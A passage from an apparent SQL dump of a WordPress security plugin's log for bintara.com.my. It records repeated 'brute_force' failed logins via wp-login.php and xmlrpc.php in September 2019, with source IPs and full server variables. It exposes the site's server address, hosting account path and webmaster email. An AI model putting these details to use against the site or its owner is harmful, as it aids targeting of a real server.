12:13:02',17907968,19231944,'https://bintara.com.my/wp-login.php',1,0,'157.230.92.254'),(24540,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"41468\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDN0Vd3b0tfDgYOg7j3@AAAAIc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568722385.9699\";s:12:\"REQUEST_TIME\";s:10:\"1568722385\";}}','notice','2019-09-17 12:13:07','2019-09-17 12:13:06',18253392,19549640,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.92.254'),(24541,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"40586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDOE1d3b0tfDgYOg7j4MAAAAIQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568722451.2238\";s:12:\"REQUEST_TIME\";s:10:\"1568722451\";}}','notice','2019-09-17 12:14:12','2019-09-17 12:14:11',17741360,19232600,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(24542,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"41082\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDOFld3b0tfDgYOg7j4MgAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568722454.5665\";s:12:\"REQUEST_TIME\";s:10:\"1568722454\";}}','notice','2019-09-17 12:14:16','2019-09-17 12:14:15',18254144,19549928,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(24543,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"42258\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDRWVd3b0tfDgYOg7j6QwAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568723289.7229\";s:12:\"REQUEST_TIME\";s:10:\"1568723289\";}}','notice','2019-09-17 12:28:11','2019-09-17 12:28:10',17741640,19233064,'https://bintara.com.my/wp-login.php',1,0,'80.82.122.216'),(24544,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"43044\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDRXFd3b0tfDgYOg7j6RgAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568723293.2704\";s:12:\"REQUEST_TIME\";s:10:\"1568723293\";}}','notice','2019-09-17 12:28:14','2019-09-17 12:28:13',18253488,19550704,'https://bintara.com.my/xmlrpc.php',1,0,'80.82.122.216'),(24545,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"161.129.139.26\";s:11:\"REMOTE_PORT\";s:5:\"44832\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDRk1d3b0tfDgYOg7j6WgAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568723348.1117\";s:12:\"REQUEST_TIME\";s:10:\"1568723348\";}}','notice','2019-09-17 12:29:09','2019-09-17 12:29:08',17742416,19232184,'https://bintara.com.my/wp-login.php',1,0,'161.129.139.26'),(24546,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"161.129.139.26\";s:11:\"REMOTE_PORT\";s:5:\"46190\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDRmVd3b0tfDgYOg7j6YAAAAIY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568723353.1743\";s:12:\"REQUEST_TIME\";s:10:\"1568723353\";}}','notice','2019-09-17 12:29:14','2019-09-17 12:29:13',18253640,19549544,'https://bintara.com.my/xmlrpc.php',1,0,'161.129.139.26'),(24547,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"107.161.24.34\";s:11:\"REMOTE_PORT\";s:5:\"35196\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDTgLIp53uPsY7BKArwegAAAEE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568723840.9992\";s:12:\"REQUEST_TIME\";s:10:\"1568723840\";}}','notice','2019-09-17 12:37:22','2019-09-17 12:37:21',17742568,19233520,'https://bintara.com.my/wp-login.php',1,0,'107.161.24.34'),(24548,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"107.161.24.34\";s:11:\"REMOTE_PORT\";s:5:\"39384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDTh1d3b0tfDgYOg7j7qgAAAIg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568723847.9793\";s:12:\"REQUEST_TIME\";s:10:\"1568723847\";}}','notice','2019-09-17 12:37:30','2019-09-17 